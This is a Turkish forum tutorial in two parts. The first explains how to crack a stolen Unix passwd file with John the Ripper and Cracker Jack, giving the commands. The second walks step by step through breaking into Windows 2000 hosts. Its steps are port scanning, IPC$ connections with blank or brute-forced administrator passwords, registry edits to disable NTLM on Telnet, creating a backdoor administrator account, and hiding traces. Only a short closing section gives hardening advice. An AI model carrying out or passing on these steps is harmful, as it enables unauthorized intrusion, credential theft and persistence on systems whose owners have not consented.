Nette Savunma ve Saldirma Yontemleri_2
 

PASSWORD DOSYASI KIRMAK

Selamlar bu yazımızda herhangi bir yolla passwd dosyasını aldığınızı farz ederek bu dosyanın nasýl kırılacağını anlatacağım. Kırma programlarında belli başlı iki tanesinden söz edeceğim. Birisi Jhon Ripper ve Cracker Jack. Yazıda bahsedeceğim wordlist hazırlama ile ilgili yazıyı sitemde ayrı bir başlık halinde bulabileceksiniz.
Daha önceki yazılarda shadowed password dosyasından bahsetmiştim. Aldığınız dosyanın shadowed olmadığından emin olun. Aşağıya örnek bir shadowed dosya ve normal dosya alıntısı yerleştiriyorum.
Shadowed:
root:x:0:1:Super-User:/:/sbin/sh
kafadar:x:65535:1:Sait Kafadar:/export/home/kafadar:/bin/tcsh
Normal:
arikanu:626552:171:100:Umit Arikan,,,:/home/arikanu:/usr/bin/passwd
kumruu:574236:172:100:Ugur Kumru,,,:/home/kumruu:/usr/bin/passwd
İlk dosyayı bundan önceki bilgilerimize göre incelersek şifre yazması gereken yerde "x" görüyoruz. onun dışındaki yerer ise tamamen aynı. şifre dosyasını bu şekilde ayırabiliriz. Gerçek dosyada ise kodlanmış password görüyoruz. Shadowed dosya KIRILMAZ..
Evet artık şifre dosyamızı da ayırdık. Şimdi şifre dosyamıza bir isim verip ilgili cracker programının klasörüne kopyalayınız. Word listi hazırlayıp onuda aynı klasöre kopyalayın.
Cracker Jack:
Jack kırdığı şifreleri jack.pot adlı bir dosyaya kaydeder.Jacpot.exe programı ise bu kırılmış şifreleri göstermeye yarar. Her 10 dakikada bir işlemleri kaydeder. Böylece her seferinde en baştan başlamaktan kurtulursunuz.
-user= Belirli bir userin passwordunu kırmak için kullanılır. Mesela sadece root şifresini kırmak için kullanılabilir. -user:root şeklinde kullanılır.
-single= Sadece user name yakın olan passwordleri wordlist olmadan kırar.
Jack.exe -w: Word List dosyası pw dosyası (-single)
Jhon The Ripper:
Bu dosyada çok kullanılan bir crackerdır. Aynı zamanda word list oluşturmadan kırma fonksiyonuda vardır. Word list ile kırmak için;
john -wordfile:wordlist dosyasını buraya yazınınız -pwfile:şifre dosyasını buraya yazınız. > Kırılan şifrelerin kaydedileceği dosyayı yazın.
Kayıt dosyası belirtildiği için kırma işlemi sırasında oluşabilecek hataları bu dosyaya yazar daha sonra bir metin editörü ile bulmanız kolay olur.
Single mod; bu modda jhon sadece user name yakın olan şifreleri kırar. Mesela phyton->phyton56 gibi. Bu modda wordlist gerekmez
John -single passwd>kayıt dosyası adı...
Incremantal Mod; bu modda jhon kendi kafasına göre karakterler üreterek kırma işlemi yapar. Normalde default değeri 8 karakterdir. Wordlist gerektirmez ama hem yavaş hem de az sayıda password buldurur. Ayrıca kendisi durmaz mutlaka elle durdurmak gerekir. (CTRL+C)
John -incremental:xxxx passwd
burda xxxx yazan yere nasıl karakter kullanılacağı yazılır. Digit rakam, alpha harf üretir
Bu arada yazdığınız komut satırının sonuna -beep eklerseniz password bulunca beep sesi verir.

WINDOWS 2000 SISTEMINI HACKLEMEK

IPC$ ille Windows 2000 sistemini hacklemek?
1.Acik Win2k sistemi icin scanerlar sayesinde
tarama yapma
2.IPC$`ye baglan
3.Bilgisayar yoneticisine baglan ve kullan
4.NTLM`yi deaktive edin ( calismasin )
5.TelNet`i calistirin
6.Kullanici accountu olusturun ve group haline getirin
7.izinizi gizleyin
8.Win2k`da sisteminizi nasil koruyacaksiniz?
Gerekli olan Arac Gerec:
-Superscan version 3.00 (246KB)
download: [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]
-NetBrute Scanner 1.0.0.7 (247KB)
download: [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]
-PQWak V1.0 (24KB)
download: [Üye Olmadan Linkleri Göremezsiniz. Üye Olmak için TIKLAYIN...]
1.Acik Win2k sistemi icin scanerlar sayesinde tarama yapma:
A)Superscan version 3.00 calistirin ( POrt scan icin )
B)IP araligi secin
C)Scan sonucunda cikan acik portlari ve tum portlari kontrol edin
D)Sadece scan port 139 (NETBIOS) ve 1025 (Network Blackjack) isinize yarayacak
E)Netbios ve BlackJack portlari bulunduktan sonra NetBrute calistirin ve istediginiz IP`yi taratin IPC$ gorunuyormu diye
2.IPC$`ye baglan:
A)DOS penceresi acin,
B)" net use ipaddressipc$ "" /user:administrator "
yazin,
C)Eger sisteme baglandiysaniz sole bir yazi yazicaktir pencerede " The command was completed successfully "
D)Eger suna benzer bir yazi yazarsa "bad username or password", sifreyi kirmak icin PQWak.exe programini calistirin.Ozaman sifreyi su sekilde yazin: net use ipaddressipc$ "password" /user:administrator
E)Cogunlukla heryerde ayni sifreyi kullanir kullanicilar.IPC$ baglanmak icin c$ ve administrator sifresini kullanin,
3.Bilgisayar yoneticisine baglan ve kullan:
A)Bilgisayar yoneticisini acin,
B)"Connect to Another Computer" dan "Action"`a tiklayin,
C)IP adresini yazin
4.NTLM`yi deaktive edin ( calismasin ):
A)"regedit" acin,
B)Su registry key baglanin: HKEY_LOCAL_MACHINE--Software--Microsoft--Telnet Server--1.0-->NTLM
C)"Value Data" Bilgileri (2) den (1) siralayin,
D)Bu IPC $ ile TelNet serverina baglanmanizi sagliycak,
5.TelNet`i calistirin:
A)Bilgisayar yoneticisinden "Services and Applications" tiklayin,
B)Servise tiklayin,
C)TelNet de sag tusa tiklayin ve ozellikleri acin,
D)Servisi otomatige ayarlayin ve baslatin,
6.Kullanici accountu olusturun ve group haline getirin:
A)Bir DOS penceresi acin ve acilan dos penceresinde sunu yazin: telnet IPaddress
B)Eger bir kullanici ismi ve sifre isterse, administrator yazin sifreyide bos birakin,
C)Kullanici ismi olusturmak icin sunu yazin:Net user username password /add
D)Kullanici ismini ve sifreyi istediginiz sekilde degistirin,
E)Kullanici accountunu domain`e eklemek icin sunu yazin: Net localgroup administrators username /add Or Net group administrators username /add
7.izinizi gizleyin:
A)Bir DOS penceresi acin ve sunu yazin:Net use ipaddressipc$ /delete
B)Ayni anda bilgisayar yoneticisine giris yapin.Security Loglara goz atin,eger security Loglar temiz ise sorun yoktur :))
8.Win2k`da sisteminizi nasil koruyacaksiniz?
A)Regedit acin,
B)Bi sonraki adimdakine baglanin,
C)HKEY_LOCAL_MACHINE--System--CurrentControlSet--Control--Lsa-->restrictanonymous
D)"Value Data" 0 dan 1 seklinde degistirin.Su sekilde bi sonuc vericektir "0x00000001(1)"
E)Bu loglari sifir IPC$ sklinde deaktive edicektir,
F)Her zaman degisik ve zor sifre kullanin Windows yada baska bir sistem icin,
G)Firewall kullanin